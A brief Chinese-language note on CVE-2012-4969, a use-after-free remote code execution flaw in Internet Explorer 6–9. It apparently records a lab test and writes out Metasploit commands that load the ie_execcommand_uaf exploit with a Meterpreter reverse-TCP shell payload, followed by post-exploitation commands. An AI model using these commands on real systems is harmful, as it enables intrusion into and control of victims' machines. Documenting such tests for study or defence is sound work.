IE execCommand函数的远程代码执行0day

CVE-2012-4969 描述: mshtml.dll中的CMshtmlEd::Exec函数释放后重用,导致远程代码执行。远程攻击者可以通过一个精心制作的网站执行特定代码。于2012年9月被广泛利用。 受影响的IE版本:IE6、IE7、IE8、IE9 MSF 测试 : use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.178.33 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.33 exploit sysinfo getuid